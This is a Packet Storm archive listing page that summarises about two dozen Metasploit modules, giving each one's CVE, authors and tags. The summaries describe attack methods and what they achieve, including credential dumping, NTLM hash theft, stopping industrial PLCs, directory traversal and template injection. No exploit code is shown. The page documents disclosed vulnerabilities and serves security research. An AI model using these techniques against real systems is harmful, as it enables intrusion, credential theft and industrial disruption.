what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New
Showing 101 - 125 of 31,853 RSS Feed

Remote Files

SAP Solution Manager Remote Unauthorized OS Commands Execution
Posted Aug 31, 2024
Authored by Dmitry Chastuhin, Pablo Artuso, Vladimir Ivanov, Yvan Genuer | Site metasploit.com

This Metasploit module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8. Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected to SolMan as a user from which the SMDAgent service starts, usually the daaadm.

tags | exploit, java, remote, web
advisories | CVE-2020-6207
SHA-256 | d3cd670695bc394e4f3ed861de2d7c717dac789ada16fbb0c7c9e1612d66ab86
WebEx Remote Command Execution Utility
Posted Aug 31, 2024
Authored by Ron Bowes | Site metasploit.com

This Metasploit module enables the execution of a single command as System by exploiting a remote code execution vulnerability in Ciscos WebEx client software.

tags | exploit, remote, code execution
advisories | CVE-2018-15442
SHA-256 | ff7ba8eee04116c187733d871f1d2cdcba7bf879d893d5749316164a92cbcb78
TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access
Posted Aug 31, 2024
Authored by aushack, Anshul Pandey | Site metasploit.com

This Metasploit module tests for directory traversal vulnerability in the UpdateAgent function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM via dot dot sequences in an HTTP request.

tags | exploit, remote, web, arbitrary
advisories | CVE-2008-2439
SHA-256 | f9f4a1cffb076eaa8de5b999f9dcbffa5aea4de87901e76b8a98aeaadfed7549
Microsoft SQL Server NTLM Stealer
Posted Aug 31, 2024
Authored by Jay Turla | Site metasploit.com

This Metasploit module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module will use the supplied credentials to connect to the target SQL Server instance and execute the native "xp_dirtree" or "xp_fileexist" stored procedure. The stored procedures will then force the service account to authenticate to the system defined in the SMBProxy option. In order for the attack to be successful, the SMB capture or relay module must be running on the system defined as the SMBProxy. The database account used to connect to the database should only require the "PUBLIC" role to execute. Successful execution of this attack usually results in local administrative access to the Windows system. Specifically, this works great for relaying credentials between two SQL Servers using a shared service account to get shells. However, if the relay fails, then the LM hash can be reversed using the Halflm rainbow tables and john the ripper. Thanks to "Sh2kerr" who wrote the ora_ntlm_stealer for the inspiration.

tags | exploit, remote, shell, local
systems | windows
SHA-256 | 81b720701c4c84c8a82d86441f0a1e83afb72be7237f8d733a14565354c12a53
Microsoft SQL Server SQL Injection NTLM Stealer
Posted Aug 31, 2024
Authored by Antti, nullbind | Site metasploit.com

This Metasploit module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module will use the SQL injection from GET_PATH to connect to the target SQL Server instance and execute the native "xp_dirtree" or stored procedure. The stored procedures will then force the service account to authenticate to the system defined in the SMBProxy option. In order for the attack to be successful, the SMB capture or relay module must be running on the system defined as the SMBProxy. The database account used to connect to the database should only require the "PUBLIC" role to execute. Successful execution of this attack usually results in local administrative access to the Windows system. Specifically, this works great for relaying credentials between two SQL Servers using a shared service account to get shells. However, if the relay fails, then the LM hash can be reversed using the Halflm rainbow tables and john the ripper.

tags | exploit, remote, shell, local, sql injection
systems | windows
SHA-256 | 07d8028c67f4c74422fce026d3e4f7c8c01787a332652cb8847f7c5bc5571deb
Android Browser Remote Code Execution Through Google Play Store XFO
Posted Aug 31, 2024
Authored by Rafay Baloch, joev | Site metasploit.com

This Metasploit module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Androids open source stock browser (the AOSP Browser) prior to 4.4. Second, the Google Play stores web interface fails to enforce a X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be targeted for script injection. As a result, this leads to remote code execution through Google Plays remote installation feature, as any application available on the Google Play store can be installed and launched on the users device. This Metasploit module requires that the user is logged into Google with a vulnerable browser. To list the activities in an APK, you can use aapt dump badging /path/to/app.apk.

tags | exploit, remote, web, vulnerability, code execution, xss
advisories | CVE-2014-6041
SHA-256 | 328d1360b3bebdb1d86c00098a6491927d2bd65f1172897b674f5d8cc7695731
Schneider Modicon Remote START/STOP Command
Posted Aug 31, 2024
Authored by Tod Beardsley, K. Reid Wightman | Site metasploit.com

The Schneider Modicon with Unity series of PLCs use Modbus function code 90 (0x5a) to perform administrative commands without authentication. This Metasploit module allows a remote user to change the state of the PLC between STOP and RUN, allowing an attacker to end process control by the PLC. This Metasploit module is based on the original modiconstop.rb Basecamp module from DigitalBond.

tags | exploit, remote
SHA-256 | b1ab2b6cc51066fbc4e2694146c089e9ffe0bd212d9fdf2475b47cf4afabb543
PhoenixContact PLC Remote START/STOP Command
Posted Aug 31, 2024
Authored by Photubias | Site metasploit.com

PhoenixContact Programmable Logic Controllers are built upon a variant of ProConOS. Communicating using a proprietary protocol over ports TCP/1962 and TCP/41100 or TCP/20547. It allows a remote user to read out the PLC Type, Firmware and Build number on port TCP/1962. And also to read out the CPU State (Running or Stopped) AND start or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series) or on port TCP/20547 (confirmed ILC 39x series).

tags | exploit, remote, tcp, protocol
advisories | CVE-2014-9195
SHA-256 | 121da6ea0c1ed5792460a8fc75979c956e19cb91d2f862453bd1833c0c4711f2
IBM DB2 Db2rcmd.exe Command Execution
Posted Aug 31, 2024
Authored by Jay Turla | Site metasploit.com

This Metasploit module exploits a vulnerability in the Remote Command Server component in IBMs DB2 Universal Database 8.1. An authenticated attacker can send arbitrary commands to the DB2REMOTECMD named pipe which could lead to administrator privileges.

tags | exploit, remote, arbitrary
advisories | CVE-2004-0795
SHA-256 | 478193d2580253a2f66c4e73298df32bcc3e7667b42fee08c31d7762a5f91cfc
SAP MaxDB Cons.exe Remote Command Injection
Posted Aug 31, 2024
Authored by Jay Turla | Site metasploit.com

SAP MaxDB is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.

tags | exploit, remote
advisories | CVE-2008-0244
SHA-256 | 0f0e0a18de2600d553a92c2cbf013099ea676612defd9a621268fe33532cc601
Android Mercury Browser Intent URI Scheme And Directory Traversal
Posted Aug 31, 2024
Authored by sinn3r, joev, rotlogix | Site metasploit.com

This Metasploit module exploits an unsafe intent URI scheme and directory traversal found in Android Mercury Browser version 3.2.3. The intent allows the attacker to invoke a private wifi manager activity, which starts a web server for Mercury on port 8888. The webserver also suffers a directory traversal that allows remote access to sensitive files. By default, this module will go after webviewCookiesChromium.db, webviewCookiesChromiumPrivate.db, webview.db, and bookmarks.db. But if this isnt enough, you can also specify the ADDITIONAL_FILES datastore option to collect more files.

tags | exploit, remote, web
SHA-256 | 42c6caf8a1093e6428f263ebc0ed216930afb756d1796e8f552f46a3d7e1ee90
Viproy CUCDM IP Phone XML Services Call Forwarding Tool
Posted Aug 31, 2024
Authored by fozavci | Site metasploit.com

The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM) 10 does not properly implement access control, which allows remote attackers to modify user information. This Metasploit module exploits the vulnerability to configure unauthorized call forwarding.

tags | exploit, remote, web
systems | cisco
advisories | CVE-2014-3300
SHA-256 | 762f21e6a5fbd5bc2b2530185a86b5249202eda276e8221ef037a769fc47d618
Viproy CUCDM IP Phone XML Services Speed Dial Attack Tool
Posted Aug 31, 2024
Authored by fozavci | Site metasploit.com

The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM), before version 10, doesn't implement access control properly, which allows remote attackers to modify user information. This Metasploit module exploits the vulnerability to make unauthorized speed dial entity manipulations.

tags | exploit, remote, web
systems | cisco
advisories | CVE-2014-3300
SHA-256 | a29708e3220657b7459cd2f5c8e3e1289481738bbee9189c1a1060eacd56bd6b
Java RMI Registry Interfaces Enumeration
Posted Aug 31, 2024
Authored by Jay Turla | Site metasploit.com

This Metasploit module gathers information from an RMI endpoint running an RMI registry interface. It enumerates the names bound in a registry and looks up each remote reference.

tags | exploit, remote, registry
SHA-256 | f622e943187d30330e9cc0618caace1cafb414ae300f57c1786d7e281a8a1511
HP ProCurve SNAC Domain Controller Credential Dumper
Posted Aug 31, 2024
Authored by rgod, juan vazquez | Site metasploit.com

This Metasploit module will extract Domain Controller credentials from vulnerable installations of HP SNAC as distributed with HP ProCurve 4.00 and 3.20. The authentication bypass vulnerability has been used to exploit remote file uploads. This vulnerability can be used to gather important information handled by the vulnerable application, like plain text domain controller credentials. This Metasploit module has been tested successfully with HP SNAC included with ProCurve Manager 4.0.

tags | exploit, remote, bypass, file upload
SHA-256 | aed454bc14ce73f32076d32a64079806c8be0da490907a6f04fd8ad00e038838
HP Operations Manager Perfd Environment Scanner
Posted Aug 31, 2024
Authored by Jay Turla | Site metasploit.com

This Metasploit module will enumerate the process list of a remote machine by abusing HP Operation Managers unauthenticated perfd daemon.

tags | exploit, remote
SHA-256 | 48743288737e4fbe8b23b6415022b845900894d016893aeebdbd614a86291a45
Windows Secrets Dump
Posted Aug 31, 2024
Authored by Alberto Solino, Christophe de la Fuente, antuache | Site metasploit.com

Dumps SAM hashes and LSA secrets (including cached creds) from the remote Windows target without executing any agent locally. This is done by remotely updating the registry key security descriptor, taking advantage of the WriteDACL privileges held by local administrators to set temporary read permissions. This can be disabled by setting the INLINE option to false and the module will fallback to the original implementation, which consists in saving the registry hives locally on the target (%SYSTEMROOT%\Temp\<random>.tmp), downloading the temporary hive files and reading the data from it. This temporary files are removed when its done. On domain controllers, secrets from Active Directory is extracted using [MS-DRDS] DRSGetNCChanges(), replicating the attributes we need to get SIDs, NTLM hashes, groups, password history, Kerberos keys and other interesting data. Note that the actual NTDS.dit file is not downloaded. Instead, the Directory Replication Service directly asks Active Directory through RPC requests. This Metasploit modules takes care of starting or enabling the Remote Registry service if needed. It will restore the service to its original state when its done. This is a port of the great Impacket secretsdump.py code written by Alberto Solino.

tags | exploit, remote, local, registry
systems | windows
SHA-256 | 2c2374c930c873d22b4c85b045bb0508b32f1c378ce30ec41a5db088c7033190
MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure
Posted Aug 31, 2024
Authored by Soroush Dalili, sinn3r | Site metasploit.com

This Metasploit module will use the Microsoft XMLDOM object to enumerate a remote machines filenames. It will try to do so against Internet Explorer 8 and Internet Explorer 9. To use it, you must supply your own list of file paths. Each file path should look like this: c:\\\\windows\\\\system32\\\\calc.exe.

tags | exploit, remote
systems | windows
advisories | CVE-2013-7331
SHA-256 | c954ae2d29b081470b554c9f8c12ad7049c63dccc594927203b359634db62c4c
Microsoft Windows Deployment Services Unattend Gatherer
Posted Aug 31, 2024
Authored by Jay Turla | Site metasploit.com

This Metasploit module will search remote file shares for unattended installation files that may contain domain credentials. This is often used after discovering domain credentials with the auxiliary/scanner/dcerpc/windows_deployment_services module or in cases where you already have domain credentials. This Metasploit module will connect to the RemInst share and any Microsoft Deployment Toolkit shares indicated by the share name comments.

tags | exploit, remote
SHA-256 | a8922994530f36b9a0330bad4526173ba5b06c6d7826f747b774c31f20810f33
Adobe ColdFusion Unauthenticated Arbitrary File Read
Posted Aug 31, 2024
Authored by Andrew | Site metasploit.com

This Metasploit module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in order to read an arbitrary file from the server. To run this module you must provide a valid ColdFusion Component (CFC) endpoint via the CFC_ENDPOINT option, and a valid remote method name from that endpoint via the CFC_METHOD option. By default an endpoint in the ColdFusion Administrator (CFIDE) is provided. If the CFIDE is not accessible you will need to choose a different CFC endpoint, method and parameters.

tags | exploit, remote, arbitrary
advisories | CVE-2023-26360
SHA-256 | de661edb8896e72bade0f7599cfd12c9bedfd968ff8993ef271deae86817594a
QNAP NAS/NVR Administrator Hash Disclosure
Posted Aug 31, 2024
Authored by bashis, wvu, Donald Knuth | Site metasploit.com

This Metasploit module exploits combined heap and stack buffer overflows for QNAP NAS and NVR devices to dump the admin (root) shadow hash from memory via an overwrite of __libc_argv[0] in the HTTP-header-bound glibc backtrace. A binary search is performed to find the correct offset for the BOFs. Since the server forks, blind remote exploitation is possible, provided the heap does not have ASLR.

tags | exploit, remote, web, overflow, root
SHA-256 | 95c0e11fc546ab62299c2204c0f7af71c9e0fb6c816a661a92afe279a76f00e3
Oracle Application Testing Suite Post-Auth DownloadServlet Directory Traversal
Posted Aug 31, 2024
Authored by sinn3r, Steven Seeley | Site metasploit.com

This Metasploit module exploits a vulnerability in Oracle Application Testing Suite (OATS). In the Load Testing interface, a remote user can abuse the custom report template selector, and cause the DownloadServlet class to read any file on the server as SYSTEM. Since the Oracle application contains multiple configuration files that include encrypted credentials, and that there are public resources for decryption, it is actually possible to gain remote code execution by leveraging this directory traversal attack. Please note that authentication is required. By default, OATS has two built-in accounts: default and administrator. You could try to target those first.

tags | exploit, remote, code execution
advisories | CVE-2019-2557
SHA-256 | 6768bb30a4e171d5b23ae9e466794b809255fbc336984aad796d15fe8f495a0b
Cisco RV320/RV326 Configuration Disclosure
Posted Aug 31, 2024
Authored by Aaron Soto, RedTeam Pentesting GmbH | Site metasploit.com

A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability.

tags | exploit, remote, web
systems | cisco
advisories | CVE-2019-1653
SHA-256 | ae43a8160ec3b8d1f33b4bc9d020eb6ea0ce8e6b3ec100f14fa67f439395f1a7
CrushFTP Unauthenticated Arbitrary File Read
Posted Aug 31, 2024
Authored by remmons-r7 | Site metasploit.com

This Metasploit module leverages an unauthenticated server-side template injection vulnerability in CrushFTP < 10.7.1 and < 11.1.0 (as well as legacy 9.x versions). Attackers can submit template injection payloads to the web API without authentication. When attacker payloads are reflected in the servers responses, the payloads are evaluated. The primary impact of the injection is arbitrary file read as root, which can result in authentication bypass, remote code execution, and NetNTLMv2 theft (when the host OS is Windows and SMB egress traffic is permitted).

tags | exploit, remote, web, arbitrary, root, code execution
systems | windows
advisories | CVE-2024-4040
SHA-256 | 060ed45f18a940bd2cb20db82dafffe7261720b5012750515c313f3b78cd0cde
Microsoft Word UNC Path Injector
Posted Aug 31, 2024
Authored by SphaZ | Site metasploit.com

This Metasploit module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007, 2010, and 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.

tags | exploit, remote
SHA-256 | 898db9627d5fe0a60eb2c43c9ba3c13690b02c22026bd42660cce6d96a78a01b
Page 5 of 1,275
Back34567Next

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close